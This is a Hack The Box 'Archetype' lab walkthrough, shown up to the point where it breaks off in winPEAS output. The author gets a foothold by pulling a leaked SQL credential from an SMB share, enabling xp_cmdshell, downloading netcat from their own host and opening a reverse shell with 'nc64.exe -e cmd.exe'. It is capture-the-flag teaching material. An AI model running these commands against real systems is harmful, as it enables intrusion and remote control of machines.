Title here
Summary here
HTB | Archetype - Starting Point
Created: Mar 12, 2026
Last edited: Mar 12, 2026
Last edited: Mar 12, 2026
https://app.hackthebox.com/machines/Archetype/
Archetype | Walkthrough
| Phase |
|---|
| Reconnaissance |
| Foothold |
Reconnaissance
Using nmap to enumerate all open ports in the target
nmap -sC -sV 10.129.16.27nopedawn@npdn ~/L/H/S/Archetype> nmap -sC -sV 10.129.16.27
Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-12 09:44 WIB
Nmap scan report for 10.129.16.27
Host is up (0.55s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-12T02:43:44
|_Not valid after: 2056-03-12T02:43:44
|_ssl-date: 2026-03-12T02:45:53+00:00; +2s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-03-12T02:45:48
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.67 secondsAfter port-scanning, service is running in windows machine and there are four service opens in tcp
135/tcp open msrpc Microsoft Windows RPC139/tcp open netbios-ssn Microsoft Windows netbios-ssn445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
Which revealed ports 135, 139, and 445 indicating SMB was available. And one port 1433 for Microsoft SQL database server.
First, let’s try to see what’s in smb without any credentials
nopedawn@npdn ~/L/H/S/Archetype> smbclient -L //10.129.16.27
Password for [WORKGROUP\nopedawn]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
SMB1 disabled -- no workgroup availableSMB enumeration was performed without credentials and there’s one non-Administrative smb share backups.
It’s time to let us in.
Foothold
nopedawn@npdn ~/L/H/S/Archetype> smbclient //10.129.16.27/backups
Password for [WORKGROUP\nopedawn]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 20 19:20:57 2020
.. D 0 Mon Jan 20 19:20:57 2020
prod.dtsConfig AR 609 Mon Jan 20 19:23:02 2020
5056511 blocks of size 4096. 2547515 blocks available
smb: \> more prod.dtsConfig
getting file \prod.dtsConfig of size 609 as /tmp/smbmore.zCptW1 (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \>
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
/tmp/smbmore.zCptW1 (END)I saw something password and User credential value in there and it may have accidentally shared sensitive ConfiguredValue from the production prod.dtsConfig file.
A DTSCONFIG file is an XML configuration file used to apply property values to SQL Server Integration Services (SSIS) packages. The file contains one or more package configurations that consist of metadata such as the server name, database names, and other connection properties to configure SSIS packages. (see more)
Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;
We know that are credential to access MSSQL (Microsoft SQl Server) Database, let’s into it
To connect I’ll use this script mssqlclient.py Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server, which I get that file from googling.
nopedawn@npdn ~/L/H/S/Archetype> python3 mssqlclient.py sa:M3g4c0rp123@10.129.16.27 -windows-auth
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[-] ERROR(ARCHETYPE): Line 1: Login failed for user 'ARCHETYPE\Guest'.
nopedawn@npdn ~/L/H/S/Archetype> python3 mssqlclient.py sql_svc:M3g4c0rp123@10.129.16.27 -windows-auth
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2017 RTM (14.0.1000)
[!] Press help for extra shell commands
SQL (ARCHETYPE\sql_svc dbo@master)>After some errors while connecting, I was able to connect using the username sql_svc instead of using default username sa.
Let’s explore inside
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC master..xp_dirtree 'C:\', 1, 1;
subdirectory depth file
------------------------- ----- ----
backups 1 0
Config.Msi 1 0
Documents and Settings 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC master..xp_dirtree 'C:\Users', 1, 1;
subdirectory depth file
------------- ----- ----
Administrator 1 0
All Users 1 0
Default 1 0
Default User 1 0
Public 1 0
sql_svc 1 0
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC master..xp_dirtree 'C:\Users\sql_svc', 1, 1;
subdirectory depth file
---------------- ----- ----
3D Objects 1 0
AppData 1 0
Application Data 1 0
Contacts 1 0
Cookies 1 0
Desktop 1 0
Documents 1 0
Downloads 1 0
Favorites 1 0
Links 1 0
Local Settings 1 0
Music 1 0
My Documents 1 0
NetHood 1 0
NTUSER.DAT 1 1
Pictures 1 0
Recent 1 0
Saved Games 1 0
Searches 1 0
SendTo 1 0
Start Menu 1 0
Templates 1 0
Videos 1 0
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC master..xp_dirtree 'C:\Users\sql_svc\Desktop', 1, 1;
subdirectory depth file
------------ ----- ----
user.txt 1 1
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC master..xp_dirtree 'C:\Users\sql_svc\Documents', 1, 1;
subdirectory depth file
------------ ----- ----
My Music 1 0
My Pictures 1 0
My Videos 1 0
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC master..xp_dirtree 'C:\Users\sql_svc\Downloads', 1, 1;
subdirectory depth file
------------ ----- ----
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC xp_cmdshell 'type C:\Users\sql_svc\Desktop\user.txt';
ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (ARCHETYPE\sql_svc dbo@master)>I found the user flag and it’s stored in C:\Users\sql_svc\Desktop\user.txt. However, I got an error if we’re using xp_cmdshell to read a file, this command are blocked and we have to escalate privilege on windows hosts or enable it.
Use this following command to enable it (see more)
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC sp_configure 'show advanced options', '1'
INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc dbo@master)> RECONFIGURE
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC sp_configure 'xp_cmdshell', '1'
INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (ARCHETYPE\sql_svc dbo@master)> RECONFIGURE
SQL (ARCHETYPE\sql_svc dbo@master)>SQL (ARCHETYPE\sql_svc dbo@master)> EXEC xp_cmdshell 'type C:\Users\sql_svc\Desktop\user.txt';
output
--------------------------------
REDACTEDNow we can use the xp_cmdshell command to read a file, and read the user flags.
User flag was submitted ✅.
Next we’ll have to enter the shell as a root and find the root flag.
In order to do that, I’ll use the winpeas to search possible paths to escalate privileges on Windows hosts and gain reverse-shell.
First I download the requirements
Next, starts a web server in currect directory
D:\HTB\Starting-Point\Archetype>python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...In another terminal, set the listener
D:\HTB\Starting-Point\Archetype>nc -lvnp 443
listening on [any] 443 ...Back to MSSQL Server, run this following command
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://<YOUR_OWN_VPN_IP>/nc64.exe -outfile nc64.exe"Note: make sure set
<YOUR_OWN_VPN_IP>to your own starting-point vpn ip from htb lab
SQL (ARCHETYPE\sql_svc dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.155/nc64.exe -outfile nc64.exe"
output
------
NULLIn web-server tab, nc64.exe file is already sended
D:\HTB\Starting-Point\Archetype>python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.16.27 - - [12/Mar/2026 11:53:24] "GET /nc64.exe HTTP/1.1" 200 -Let’s make sure if nc64.exe file is already downloaded
SQL (ARCHETYPE\sql_svc dbo@master)> EXEC master..xp_dirtree 'C:\Users\sql_svc\Downloads', 1, 1;
subdirectory depth file
------------ ----- ----
nc64.exe 1 1Again, return to MSSQL Server to execute netcat command
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.16.155 443"SQL (ARCHETYPE\sql_svc dbo@master)> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.16.155 443"
SQL (-@master)>In listener terminal, we successfully got the reverse-shell working in cmd
D:\HTB\Starting-Point\Archetype>nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.155] from (UNKNOWN) [10.129.16.27] 49678
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\sql_svc\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9565-0B4F
Directory of C:\Users\sql_svc\Downloads
03/11/2026 09:53 PM <DIR> .
03/11/2026 09:53 PM <DIR> ..
03/11/2026 09:53 PM 45,272 nc64.exe
1 File(s) 45,272 bytes
2 Dir(s) 10,717,171,712 bytes free
C:\Users\sql_svc\Downloads>Let’s try to switch into powershell and send winPEASx64.exe file
C:\Users\sql_svc\Downloads>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\sql_svc\Downloads> wget http://10.10.16.155/winPEASx64.exe -outfile winPEASx64.exe
wget http://10.10.16.155/winPEASx64.exe -outfile winPEASx64.exe
PS C:\Users\sql_svc\Downloads>Check all files to make sure it has been downloaded.
PS C:\Users\sql_svc\Downloads> dir
dir
Directory: C:\Users\sql_svc\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/11/2026 9:53 PM 45272 nc64.exe
-a---- 3/11/2026 10:21 PM 11084288 winPEASx64.exe
PS C:\Users\sql_svc\Downloads>It’s time to privesc using winpeas and see what we can get from it
.\winPEASx64.exePS C:\Users\sql_svc\Downloads> .\winPEASx64.exe
.\winPEASx64.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
((###################################(/************(((((
((#######################################(*********(((((
((#######(,.***.,(###################(..***.*******(((((
((#######*(#####((##################((######/(*****(((((
((###################(/***********(##############()(((((
(((#####################/*******(################)((((((
((((############################################)((((((
(((((##########################################)(((((((
((((((########################################)(((((((
((((((((####################################)((((((((
(((((((((#################################)(((((((((
((((((((((##########################)(((((((((
((((((((((((((((((((((((((((((((((((((
((((((((((((((((((((((((((((((
ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.
WinPEAS-ng by @hacktricks_live
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
| --------------------------------------------------------------------------------- |
| Learn Cloud Hacking : training.hacktricks.xyz |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
| --------------------------------------------------------------------------------- |
| Thank you! |
\---------------------------------------------------------------------------------/
[+] Legend:
Red Indicates a special privilege over an object or something is misconfigured
Green Indicates that some protection is enabled or something is well configured
Cyan Indicates active users
Blue Indicates disabled users
LightYellow Indicates links
You can find a Windows local PE Checklist here: https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html
Creating Dynamic lists, this could take a while, please wait...
- Loading sensitive_files yaml definitions file...
- Loading regexes yaml definitions file...
- Checking if domain...
- Getting Win32_UserAccount info...
- Creating current user groups list...
- Creating active users list (local only)...
- Creating disabled users list...
- Admin users list...
- Creating AppLocker bypass list...
- Creating files/directories list for search...
════════════════════════════════════╣ System Information (T1082,T1068,T1548.002,T1003.001,T1003.004,T1003.005,T1059.001,T1552.001,T1552.002,T1562.001,T1562.002,T1518.001,T1557.001,T1558,T1559,T1134.001,T1547.005,T1484.001,T1613,T1654,T1072,T1187) ╠════════════════════════════════════
╔══════════╣ Basic System Information (T1082)
╚ Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#version-exploits
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
System Type: x64-based PC
Hostname: Archetype
ProductName: Windows Server 2019 Standard
EditionID: ServerStandard
ReleaseId: 1809
BuildBranch: rs5_release
CurrentMajorVersionNumber: 10
CurrentVersion: 6.3
Architecture: AMD64
ProcessorCount: 2
SystemLang: en-US
KeyboardLang: English (United States)
TimeZone: (UTC-08:00) Pacific Time (US & Canada)
IsVirtualMachine: True
Current Time: 3/11/2026 10:25:47 PM
HighIntegrity: False
PartOfDomain: False
Hotfixes: KB5004335 (7/27/2021), KB5003711 (7/26/2021), KB5004244 (7/27/2021),
╔══════════╣ Windows Version Vulnerabilities (T1082,T1068)
╚ WES-NG product candidates: Windows Server 2019 | Windows Server 2019 (Server Core installation)
╚ Definitions date: 20260227
╚ Installed hotfixes detected: 3
╚ Pre-filter matches: 350, filtered by installed/superseded KBs: 300
Matched 50 known exploited vulnerabilities for this running Windows version.
Matched products: Windows Server 2019 | Windows Server 2019 (Server Core installation)
CVE-2018-8544 KB4467708 [Critical] Remote Code Execution
CVE-2025-47981 KB5062557 [Critical] Remote Code Execution
CVE-2025-59287 KB5070883 [Critical] Remote Code Execution
CVE-2018-8411 KB4464330 [Important] Elevation of Privilege
CVE-2018-8423 KB4464330 [Important] Remote Code Execution
CVE-2018-8453 KB4464330 [Important] Elevation of Privilege
CVE-2018-8550 KB4467708 [Important] Elevation of Privilege
CVE-2018-8584 KB4467708 [Important] Elevation of Privilege
CVE-2019-0543 KB4480116 [Important] Elevation of Privilege
CVE-2019-0552 KB4480116 [Important] Elevation of Privilege
CVE-2019-0555 KB4487044 [Important] Elevation of Privilege
CVE-2019-0570 KB4480116 [Important] Elevation of Privilege
CVE-2019-0571 KB4480116 [Important] Elevation of Privilege
CVE-2019-0572 KB4480116 [Important] Elevation of Privilege
CVE-2019-0573 KB4480116 [Important] Elevation of Privilege
CVE-2019-0574 KB4480116 [Important] Elevation of Privilege
CVE-2019-0730 KB4493509 [Important] Elevation of Privilege
CVE-2019-0731 KB4493509 [Important] Elevation of Privilege
CVE-2019-0732 KB4493509 [Important] Security Feature Bypass
CVE-2019-0735 KB4493509 [Important] Elevation of Privilege
╚ Showing 20/50 results.
╚ This check applies version matching with installed/superseded KB filtering.
╔══════════╣ Showing All Microsoft Updates (T1082)
[X] Exception: Exception has been thrown by the target of an invocation.
╔══════════╣ System Last Shutdown Date/time (from Registry)
(T1082)
Last Shutdown Date/time : 10/14/2021 1:19:25 AM
╔══════════╣ User Environment Variables (T1082)
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: ARCHETYPE
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Users\sql_svc\AppData\Local
PSModulePath: C:\Users\sql_svc\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\PowerShell\Modules\
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\DTS\Binn\;C:\Users\sql_svc\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\sql_svc
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
COMPLUS_MDA: InvalidVariant;RaceOnRCWCleanup;InvalidFunctionPointerInDelegate;InvalidMemberDeclaration;ReleaseHandleFailed;MarshalCleanupError;ReportAvOnComRelease;DangerousThreadingAPI;invalidOverlappedToPinvoke
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\sql_svc\AppData\Local\Temp
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\sql_svc\AppData\Roaming
TMP: C:\Users\sql_svc\AppData\Local\Temp
USERNAME: sql_svc
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: ARCHETYPE
╔══════════╣ System Environment Variables (T1082)
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\130\Tools\Binn\;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\Tools\Binn\;C:\Program Files\Microsoft SQL Server\140\DTS\Binn\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Microsoft SQL Server\140\Tools\PowerShell\Modules\
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
╔══════════╣ Audit Settings (T1562.002)
╚ Check what is being logged
Not Found
╔══════════╣ Audit Policy Settings - Classic & Advanced (T1562.002)
╔══════════╣ WEF Settings (T1562.002)
╚ Windows Event Forwarding, is interesting to know were are sent the logs
Not Found
╔══════════╣ LAPS Settings (T1003.004)
╚ If installed, local administrator password is changed frequently and is restricted by ACL
LAPS Enabled: LAPS not installed
╔══════════╣ Wdigest (T1003.001)
╚ If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wdigest
Wdigest is not enabled
╔══════════╣ LSA Protection (T1003.001)
╚ If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#lsa-protection
LSA Protection is not enabled
╔══════════╣ Credentials Guard (T1003.001)
╚ If enabled, a driver is needed to read LSASS memory https://book.hacktricks.wiki/windows-hardening/stealing-credentials/credentials-protections#credentials-guard
CredentialGuard is not enabled
Virtualization Based Security Status: Not enabled
Configured: False
Running: False
╔══════════╣ Cached Creds (T1003.005)
╚ If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#cached-credentials
cachedlogonscount is 10
╔══════════╣ Enumerating saved credentials in Registry (CurrentPass) (T1552.002)
╔══════════╣ AV Information (T1518.001)
[X] Exception: Invalid namespace
No AV was detected!!
Not Found
╔══════════╣ Windows Defender configuration (T1518.001)
Local Settings
Group Policy Settings
╔══════════╣ UAC Status (T1548.002)
╚ If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss
ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
EnableLUA: 1
LocalAccountTokenFilterPolicy:
FilterAdministratorToken:
[*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken != 1.
[-] Only the RID-500 local admin account can be used for lateral movement.
╔══════════╣ PowerShell Settings (T1059.001)
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.17763.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 79B
╔══════════╣ Enumerating PowerShell Session Settings using the registry (T1059.001)
You must be an administrator to run this check
╔══════════╣ PS default transcripts history (T1552.001)
╚ Read the PS history inside these files (if any)
╔══════════╣ HKCU Internet Settings (T1082)
DisableCachingOfSSLPages: 0
IE5_UA_Backup_Flag: 5.0
PrivacyAdvanced: 1
SecureProtocols: 2688
User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
CertificateRevocation: 1
ZonesSecurityUpgrade: System.Byte[]
╔══════════╣ HKLM Internet Settings (T1082)
EnablePunycode: 1
╔══════════╣ Drives Information (T1082)
╚ Remember that you should search more info inside the other drives
C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 9 GB)(Permissions: Users [Allow: AppendData/CreateDirectories])
╔══════════╣ Checking WSUS (T1072,T1068)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus
Not Found
╔══════════╣ Checking KrbRelayUp (T1187,T1558)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#krbrelayup
The system isn't inside a domain, so it isn't vulnerable
╔══════════╣ Checking If Inside Container (T1613)
╚ If the binary cexecsvc.exe or associated service exists, you are inside Docker
You are NOT inside a container
╔══════════╣ Checking AlwaysInstallElevated (T1548.002)
╚ https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
AlwaysInstallElevated isn't available
╔══════════╣ Object Manager race-window amplification primitives (T1068)
╚ Project Zero write-up: https://projectzero.google/2025/12/windows-exploitation-techniques.html
Created a test named event (PEAS_OMNS_2332_15976198b3be4c5d9292a72e2306dee6) under \BaseNamedObjects.
╚ -> Low-privileged users can slow NtOpen*/NtCreate* lookups using ~32k-character names or ~16k-level directory chains.
╚ -> Point attacker-controlled symbolic links to the slow path to stretch kernel race windows.
╚ -> Use this whenever a bug follows check -> NtOpenX -> privileged action patterns.
╔══════════╣ Enumerate LSA settings - auth packages included
(T1547.005)
auditbasedirectories : 0
auditbaseobjects : 0
Bounds : 00-30-00-00-00-20-00-00
crashonauditfail : 0
fullprivilegeauditing : 00
LimitBlankPasswordUse : 1
NoLmHash : 1
Security Packages : ""
Notification Packages : scecli
Authentication Packages : msv1_0
SecureBoot : 1
LsaPid : 624
LsaCfgFlagsDefault : 0
ProductType : 7
disabledomaincreds : 0
everyoneincludesanonymous : 0
forceguest : 0
restrictanonymous : 0
restrictanonymoussam : 1
╔══════════╣ Enumerating NTLM Settings (T1557.001)
LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)
NTLM Signing Settings
ClientRequireSigning : False
ClientNegotiateSigning : True
ServerRequireSigning : False
ServerNegotiateSigning : False
LdapSigning : Negotiate signing (Negotiate signing)
Session Security
NTLMMinClientSec : 536870912 (Require 128-bit encryption)
NTLMMinServerSec : 536870912 (Require 128-bit encryption)
NTLM Auditing and Restrictions
InboundRestrictions : (Not defined)
OutboundRestrictions : (Not defined)
InboundAuditing : (Not defined)
OutboundExceptions :
╔══════════╣ Display Local Group Policy settings - local users/machine (T1082)
╔══════════╣ Potential GPO abuse vectors (applied domain GPOs writable by current user) (T1484.001)
Host is not joined to a domain or domain info is unavailable.
╔══════════╣ Checking AppLocker effective policy
AppLockerPolicy version: 1
listing rules:
╔══════════╣ PrintNightmare PointAndPrint Policies (T1068)
╚ Check PointAndPrint policy hardening https://itm4n.github.io/printnightmare-exploitation/
Not Found
╔══════════╣ Enumerating Printers (WMI) (T1082)
╔══════════╣ Enumerating Named Pipes (T1559)
Name CurrentUserPerms Sddl
eventlog Everyone [Allow: WriteData/CreateFiles] O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
sql\query Everyone [Allow: WriteData/CreateFiles], sql_svc [Allow: AppendData/CreateDirectories] O:S-1-5-21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)
SQLLocal\MSSQLSERVER Everyone [Allow: WriteData/CreateFiles], sql_svc [Allow: AppendData/CreateDirectories] O:S-1-5-21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)
vgauth-service Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
╔══════════╣ Named Pipes with Low-Priv Write Access to Privileged Servers (T1134.001,T1559)
\\.\pipe\eventlog
Low-priv ACLs : Everyone [CreateFiles|WriteAttributes|WriteData|WriteExtendedAttributes]
Observed owners: No privileged handles observed (service idle or access denied)
SDDL : O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
=================================================================================================
\\.\pipe\sql\query
Low-priv ACLs : Everyone [CreateFiles|WriteAttributes|WriteData|WriteExtendedAttributes]
Observed owners: No privileged handles observed (service idle or access denied)
SDDL : O:S-1-5-21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)
=================================================================================================
\\.\pipe\SQLLocal\MSSQLSERVER
Low-priv ACLs : Everyone [CreateFiles|WriteAttributes|WriteData|WriteExtendedAttributes]
Observed owners: No privileged handles observed (service idle or access denied)
SDDL : O:S-1-5-21-1479773013-2644727484-962428355-1001G:S-1-5-21-1479773013-2644727484-962428355-513D:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-1479773013-2644727484-962428355-1001)
=================================================================================================
\\.\pipe\vgauth-service
